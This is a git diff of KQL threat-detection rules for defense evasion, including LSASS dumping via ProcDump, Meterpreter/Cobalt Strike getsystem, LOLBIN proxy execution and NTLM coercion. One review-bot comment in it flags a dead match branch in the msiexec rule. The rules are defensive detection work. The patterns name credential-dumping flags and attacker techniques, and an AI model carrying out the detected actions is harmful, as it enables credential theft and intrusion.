diff --git a/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql b/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql
index 4f108098..64e50595 100644
--- a/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql
+++ b/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql
@@ -1,11 +1,11 @@
-// Title: Potential File Download Via MS-AppInstaller Protocol Handler
-// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
-// Date: 2023-11-09
-// Level: medium
-// Description: Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE
-// The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1218
-
-DeviceProcessEvents
+// Title: Potential File Download Via MS-AppInstaller Protocol Handler
+// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
+// Date: 2023-11-09
+// Level: medium
+// Description: Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE
+// The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "ms-appinstaller://" and ProcessCommandLine contains "source=") and ProcessCommandLine contains "http"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql
index 8b44ac72..088e87ae 100644
--- a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql
+++ b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql
@@ -1,12 +1,12 @@
-// Title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream
-// Author: Scoubi (@ScoubiMtl)
-// Date: 2023-10-09
-// Level: medium
-// Description: Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe"
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564.004
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream
+// Author: Scoubi (@ScoubiMtl)
+// Date: 2023-10-09
+// Level: medium
+// Description: Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where FolderPath contains "::$index_allocation"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql
index 0208baee..52c4e4bb 100644
--- a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql
+++ b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql
@@ -1,12 +1,12 @@
-// Title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI
-// Author: Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl)
-// Date: 2023-10-09
-// Level: medium
-// Description: Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564.004
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI
+// Author: Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl)
+// Date: 2023-10-09
+// Level: medium
+// Description: Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "::$index_allocation"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql
index 09b123c5..4f75e317 100644
--- a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql
+++ b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql
@@ -1,14 +1,14 @@
-// Title: Potential Homoglyph Attack Using Lookalike Characters
-// Author: Micah Babinski, @micahbabinski
-// Date: 2023-05-07
-// Level: medium
-// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
-// This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
-// are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036, attack.t1036.003
-// False Positives:
-// - Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use.
-
-DeviceProcessEvents
+// Title: Potential Homoglyph Attack Using Lookalike Characters
+// Author: Micah Babinski, @micahbabinski
+// Date: 2023-05-07
+// Level: medium
+// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
+// This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
+// are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1036.003
+// False Positives:
+// - Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "а" or ProcessCommandLine contains "е" or ProcessCommandLine contains "о" or ProcessCommandLine contains "р" or ProcessCommandLine contains "с" or ProcessCommandLine contains "х" or ProcessCommandLine contains "ѕ" or ProcessCommandLine contains "і" or ProcessCommandLine contains "ӏ" or ProcessCommandLine contains "ј" or ProcessCommandLine contains "һ" or ProcessCommandLine contains "ԁ" or ProcessCommandLine contains "ԛ" or ProcessCommandLine contains "ԝ" or ProcessCommandLine contains "ο") or (ProcessCommandLine contains "А" or ProcessCommandLine contains "В" or ProcessCommandLine contains "Е" or ProcessCommandLine contains "К" or ProcessCommandLine contains "М" or ProcessCommandLine contains "Н" or ProcessCommandLine contains "О" or ProcessCommandLine contains "Р" or ProcessCommandLine contains "С" or ProcessCommandLine contains "Т" or ProcessCommandLine contains "Х" or ProcessCommandLine contains "Ѕ" or ProcessCommandLine contains "І" or ProcessCommandLine contains "Ј" or ProcessCommandLine contains "Ү" or ProcessCommandLine contains "Ӏ" or ProcessCommandLine contains "Ԍ" or ProcessCommandLine contains "Ԛ" or ProcessCommandLine contains "Ԝ" or ProcessCommandLine contains "Α" or ProcessCommandLine contains "Β" or ProcessCommandLine contains "Ε" or ProcessCommandLine contains "Ζ" or ProcessCommandLine contains "Η" or ProcessCommandLine contains "Ι" or ProcessCommandLine contains "Κ" or ProcessCommandLine contains "Μ" or ProcessCommandLine contains "Ν" or ProcessCommandLine contains "Ο" or ProcessCommandLine contains "Ρ" or ProcessCommandLine contains "Τ" or ProcessCommandLine contains "Υ" or ProcessCommandLine contains "Χ")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql
index a0864334..eda4034a 100644
--- a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql
+++ b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql
@@ -1,14 +1,14 @@
-// Title: Potential Homoglyph Attack Using Lookalike Characters in Filename
-// Author: Micah Babinski, @micahbabinski
-// Date: 2023-05-08
-// Level: medium
-// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
-// This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
-// are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036, attack.t1036.003
-// False Positives:
-// - File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use.
-
-DeviceFileEvents
+// Title: Potential Homoglyph Attack Using Lookalike Characters in Filename
+// Author: Micah Babinski, @micahbabinski
+// Date: 2023-05-08
+// Level: medium
+// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
+// This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
+// are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1036.003
+// False Positives:
+// - File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use.
+
+DeviceFileEvents
 | where (FolderPath contains "а" or FolderPath contains "е" or FolderPath contains "о" or FolderPath contains "р" or FolderPath contains "с" or FolderPath contains "х" or FolderPath contains "ѕ" or FolderPath contains "і" or FolderPath contains "ӏ" or FolderPath contains "ј" or FolderPath contains "һ" or FolderPath contains "ԁ" or FolderPath contains "ԛ" or FolderPath contains "ԝ" or FolderPath contains "ο") or (FolderPath contains "А" or FolderPath contains "В" or FolderPath contains "Е" or FolderPath contains "К" or FolderPath contains "М" or FolderPath contains "Н" or FolderPath contains "О" or FolderPath contains "Р" or FolderPath contains "С" or FolderPath contains "Т" or FolderPath contains "Х" or FolderPath contains "Ѕ" or FolderPath contains "І" or FolderPath contains "Ј" or FolderPath contains "Ү" or FolderPath contains "Ӏ" or FolderPath contains "Ԍ" or FolderPath contains "Ԛ" or FolderPath contains "Ԝ" or FolderPath contains "Α" or FolderPath contains "Β" or FolderPath contains "Ε" or FolderPath contains "Ζ" or FolderPath contains "Η" or FolderPath contains "Ι" or FolderPath contains "Κ" or FolderPath contains "Μ" or FolderPath contains "Ν" or FolderPath contains "Ο" or FolderPath contains "Ρ" or FolderPath contains "Τ" or FolderPath contains "Υ" or FolderPath contains "Χ")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_lethalhta_technique_execution.kql b/KQL/rules/Defense Evasion/potential_lethalhta_technique_execution.kql
index 9b94e252..0a5e2204 100644
--- a/KQL/rules/Defense Evasion/potential_lethalhta_technique_execution.kql
+++ b/KQL/rules/Defense Evasion/potential_lethalhta_technique_execution.kql
@@ -1,10 +1,10 @@
-// Title: Potential LethalHTA Technique Execution
-// Author: Markus Neis
-// Date: 2018-06-07
-// Level: high
-// Description: Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.005
-
-DeviceProcessEvents
+// Title: Potential LethalHTA Technique Execution
+// Author: Markus Neis
+// Date: 2018-06-07
+// Level: high
+// Description: Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.005
+
+DeviceProcessEvents
 | where FolderPath endswith "\\mshta.exe" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_libvlc_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_libvlc_dll_sideloading.kql
index 33f0631e..4ba1d45e 100644
--- a/KQL/rules/Defense Evasion/potential_libvlc_dll_sideloading.kql
+++ b/KQL/rules/Defense Evasion/potential_libvlc_dll_sideloading.kql
@@ -1,12 +1,12 @@
-// Title: Potential Libvlc.DLL Sideloading
-// Author: X__Junior
-// Date: 2023-04-17
-// Level: medium
-// Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
-// False Positives:
-// - False positives are expected if VLC is installed in non-default locations
-
-DeviceImageLoadEvents
+// Title: Potential Libvlc.DLL Sideloading
+// Author: X__Junior
+// Date: 2023-04-17
+// Level: medium
+// Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - False positives are expected if VLC is installed in non-default locations
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\libvlc.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\VideoLAN\\VLC\\" or FolderPath startswith "C:\\Program Files\\VideoLAN\\VLC\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql b/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql
index f8ad213b..a5aa6c57 100644
--- a/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql
+++ b/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql
@@ -1,16 +1,16 @@
-// Title: Potential LSASS Process Dump Via Procdump
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018-10-30
-// Level: high
-// Description: Detects potential credential harvesting attempts through LSASS memory dumps using ProcDump.
-// This rule identifies suspicious command-line patterns that combine memory dump flags (-ma, -mm, -mp) with LSASS-related process markers.
-// LSASS (Local Security Authority Subsystem Service) contains sensitive authentication data including plaintext passwords, NTLM hashes, and Kerberos tickets in memory.
-// Attackers commonly dump LSASS memory to extract credentials for lateral movement and privilege escalation.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036, attack.credential-access, attack.t1003.001, car.2013-05-009
-// False Positives:
-// - Unlikely, because no one should dump an lsass process memory
-// - Another tool that uses command line flags similar to ProcDump
-
-DeviceProcessEvents
+// Title: Potential LSASS Process Dump Via Procdump
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-10-30
+// Level: high
+// Description: Detects potential credential harvesting attempts through LSASS memory dumps using ProcDump.
+// This rule identifies suspicious command-line patterns that combine memory dump flags (-ma, -mm, -mp) with LSASS-related process markers.
+// LSASS (Local Security Authority Subsystem Service) contains sensitive authentication data including plaintext passwords, NTLM hashes, and Kerberos tickets in memory.
+// Attackers commonly dump LSASS memory to extract credentials for lateral movement and privilege escalation.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.credential-access, attack.t1003.001, car.2013-05-009
+// False Positives:
+// - Unlikely, because no one should dump an lsass process memory
+// - Another tool that uses command line flags similar to ProcDump
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma " or ProcessCommandLine contains " –ma " or ProcessCommandLine contains " —ma " or ProcessCommandLine contains " ―ma " or ProcessCommandLine contains " -mm " or ProcessCommandLine contains " /mm " or ProcessCommandLine contains " –mm " or ProcessCommandLine contains " —mm " or ProcessCommandLine contains " ―mm " or ProcessCommandLine contains " -mp " or ProcessCommandLine contains " /mp " or ProcessCommandLine contains " –mp " or ProcessCommandLine contains " —mp " or ProcessCommandLine contains " ―mp ") and (ProcessCommandLine contains " ls" or ProcessCommandLine contains " keyiso" or ProcessCommandLine contains " samss")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_manage_bde_wsf_abuse_to_proxy_execution.kql b/KQL/rules/Defense Evasion/potential_manage_bde_wsf_abuse_to_proxy_execution.kql
index 4cdaeef5..178f8a80 100644
--- a/KQL/rules/Defense Evasion/potential_manage_bde_wsf_abuse_to_proxy_execution.kql
+++ b/KQL/rules/Defense Evasion/potential_manage_bde_wsf_abuse_to_proxy_execution.kql
@@ -1,12 +1,12 @@
-// Title: Potential Manage-bde.wsf Abuse To Proxy Execution
-// Author: oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020-10-13
-// Level: high
-// Description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1216
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential Manage-bde.wsf Abuse To Proxy Execution
+// Author: oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-13
+// Level: high
+// Description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "manage-bde.wsf" and (FolderPath endswith "\\wscript.exe" or ProcessVersionInfoOriginalFileName =~ "wscript.exe")) or ((InitiatingProcessCommandLine contains "manage-bde.wsf" and (InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(FolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_memory_dumping_activity_via_livekd.kql b/KQL/rules/Defense Evasion/potential_memory_dumping_activity_via_livekd.kql
index b71d8e71..9efe4f59 100644
--- a/KQL/rules/Defense Evasion/potential_memory_dumping_activity_via_livekd.kql
+++ b/KQL/rules/Defense Evasion/potential_memory_dumping_activity_via_livekd.kql
@@ -1,12 +1,12 @@
-// Title: Potential Memory Dumping Activity Via LiveKD
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-15
-// Level: medium
-// Description: Detects execution of LiveKD based on PE metadata or image name
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-// False Positives:
-// - Administration and debugging activity (must be investigated)
-
-DeviceProcessEvents
+// Title: Potential Memory Dumping Activity Via LiveKD
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: medium
+// Description: Detects execution of LiveKD based on PE metadata or image name
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Administration and debugging activity (must be investigated)
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe") or ProcessVersionInfoOriginalFileName =~ "livekd.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_meterpreter_cobaltstrike_activity.kql b/KQL/rules/Defense Evasion/potential_meterpreter_cobaltstrike_activity.kql
index 178c730c..f77d2325 100644
--- a/KQL/rules/Defense Evasion/potential_meterpreter_cobaltstrike_activity.kql
+++ b/KQL/rules/Defense Evasion/potential_meterpreter_cobaltstrike_activity.kql
@@ -1,13 +1,13 @@
-// Title: Potential Meterpreter/CobaltStrike Activity
-// Author: Teymur Kheirkhabarov, Ecco, Florian Roth
-// Date: 2019-10-26
-// Level: high
-// Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.001, attack.t1134.002
-// False Positives:
-// - Commandlines containing components like cmd accidentally
-// - Jobs and services started with cmd
-
-DeviceProcessEvents
+// Title: Potential Meterpreter/CobaltStrike Activity
+// Author: Teymur Kheirkhabarov, Ecco, Florian Roth
+// Date: 2019-10-26
+// Level: high
+// Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.001, attack.t1134.002
+// False Positives:
+// - Commandlines containing components like cmd accidentally
+// - Jobs and services started with cmd
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\services.exe" and (((ProcessCommandLine contains "cmd" or ProcessCommandLine contains "%COMSPEC%") and (ProcessCommandLine contains "/c" and ProcessCommandLine contains "echo" and ProcessCommandLine contains "\\pipe\\")) or (ProcessCommandLine contains "rundll32" and ProcessCommandLine contains ".dll,a" and ProcessCommandLine contains "/p:")) and (not(ProcessCommandLine contains "MpCmdRun"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_mftrace_exe_abuse.kql b/KQL/rules/Defense Evasion/potential_mftrace_exe_abuse.kql
index a7f8629d..bc7060f8 100644
--- a/KQL/rules/Defense Evasion/potential_mftrace_exe_abuse.kql
+++ b/KQL/rules/Defense Evasion/potential_mftrace_exe_abuse.kql
@@ -1,12 +1,12 @@
-// Title: Potential Mftrace.EXE Abuse
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-09
-// Level: medium
-// Description: Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1127
-// False Positives:
-// - Legitimate use for tracing purposes
-
-DeviceProcessEvents
+// Title: Potential Mftrace.EXE Abuse
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-09
+// Level: medium
+// Description: Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+// - Legitimate use for tracing purposes
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\mftrace.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_msiexec_masquerading.kql b/KQL/rules/Defense Evasion/potential_msiexec_masquerading.kql
index 97112aef..4528084c 100644
--- a/KQL/rules/Defense Evasion/potential_msiexec_masquerading.kql
+++ b/KQL/rules/Defense Evasion/potential_msiexec_masquerading.kql
@@ -1,10 +1,10 @@
-// Title: Potential MsiExec Masquerading
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-11-14
-// Level: high
-// Description: Detects the execution of msiexec.exe from an uncommon directory
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036.005
-
-DeviceProcessEvents
+// Title: Potential MsiExec Masquerading
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-11-14
+// Level: high
+// Description: Detects the execution of msiexec.exe from an uncommon directory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_ntlm_coercion_via_certutil_exe.kql b/KQL/rules/Defense Evasion/potential_ntlm_coercion_via_certutil_exe.kql
index 07571635..75328785 100644
--- a/KQL/rules/Defense Evasion/potential_ntlm_coercion_via_certutil_exe.kql
+++ b/KQL/rules/Defense Evasion/potential_ntlm_coercion_via_certutil_exe.kql
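Review bot: In the context line, `ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe"` compares the PE version-resource OriginalFileName (a bare file name) against a value with a leading backslash, so that branch is dead and only the `FolderPath endswith "\\msiexec.exe"` branch ever fires; a process that spoofs its path but keeps the original file name goes unnoticed. Proposed: `ProcessVersionInfoOriginalFileName =~ "msiexec.exe"`. The hunk itself only re-emits the header lines unchanged (line-ending churn), so the correction belongs upstream in the converter or the source rule rather than in this generated file.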
@@ -1,10 +1,10 @@
-// Title: Potential NTLM Coercion Via Certutil.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-01
-// Level: high
-// Description: Detects possible NTLM coercion via certutil using the 'syncwithWU' flag
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: Potential NTLM Coercion Via Certutil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-01
+// Level: high
+// Description: Detects possible NTLM coercion via certutil using the 'syncwithWU' flag
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -syncwithWU " and ProcessCommandLine contains " \\\\") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_obfuscated_ordinal_call_via_rundll32.kql b/KQL/rules/Defense Evasion/potential_obfuscated_ordinal_call_via_rundll32.kql
index 5029f77d..468f6209 100644
--- a/KQL/rules/Defense Evasion/potential_obfuscated_ordinal_call_via_rundll32.kql
+++ b/KQL/rules/Defense Evasion/potential_obfuscated_ordinal_call_via_rundll32.kql
@@ -1,10 +1,10 @@
-// Title: Potential Obfuscated Ordinal Call Via Rundll32
-// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2023-05-17
-// Level: medium
-// Description: Detects execution of "rundll32" with potential obfuscated ordinal calls
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027.010
-
-DeviceProcessEvents
+// Title: Potential Obfuscated Ordinal Call Via Rundll32
+// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2023-05-17
+// Level: medium
+// Description: Detects execution of "rundll32" with potential obfuscated ordinal calls
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.010
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "#+" or ProcessCommandLine contains "#-" or ProcessCommandLine contains "#0" or ProcessCommandLine contains "#655" or ProcessCommandLine contains "#656") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_password_spraying_attempt_using_dsacls_exe.kql b/KQL/rules/Defense Evasion/potential_password_spraying_attempt_using_dsacls_exe.kql
index 2f8dca1e..25d2e033 100644
--- a/KQL/rules/Defense Evasion/potential_password_spraying_attempt_using_dsacls_exe.kql
+++ b/KQL/rules/Defense Evasion/potential_password_spraying_attempt_using_dsacls_exe.kql
@@ -1,12 +1,12 @@
-// Title: Potential Password Spraying Attempt Using Dsacls.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-20
-// Level: medium
-// Description: Detects possible password spraying attempts using Dsacls
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - Legitimate use of dsacls to bind to an LDAP session
-
-DeviceProcessEvents
+// Title: Potential Password Spraying Attempt Using Dsacls.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects possible password spraying attempts using Dsacls
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate use of dsacls to bind to an LDAP session
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/user:" and ProcessCommandLine contains "/passwd:") and (FolderPath endswith "\\dsacls.exe" or ProcessVersionInfoOriginalFileName =~ "DSACLS.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql b/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql
index 8881b362..4566be91 100644
--- a/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql
+++ b/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql
@@ -1,12 +1,12 @@
-// Title: Potential PendingFileRenameOperations Tampering
-// Author: frack113
-// Date: 2023-01-27
-// Level: medium
-// Description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036.003
-// False Positives:
-// - Installers and updaters may set currently in use files for rename or deletion after a reboot.
-
-DeviceRegistryEvents
+// Title: Potential PendingFileRenameOperations Tampering
+// Author: frack113
+// Date: 2023-01-27
+// Level: medium
+// Description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+// False Positives:
+// - Installers and updaters may set currently in use files for rename or deletion after a reboot.
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\CurrentControlSet\\Control\\Session Manager\\PendingFileRenameOperations" and ((InitiatingProcessFolderPath endswith "\\reg.exe" or InitiatingProcessFolderPath endswith "\\regedit.exe") or InitiatingProcessFolderPath contains "\\Users\\Public\\")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql
index 440754e0..c3b4845d 100644
--- a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql
+++ b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql
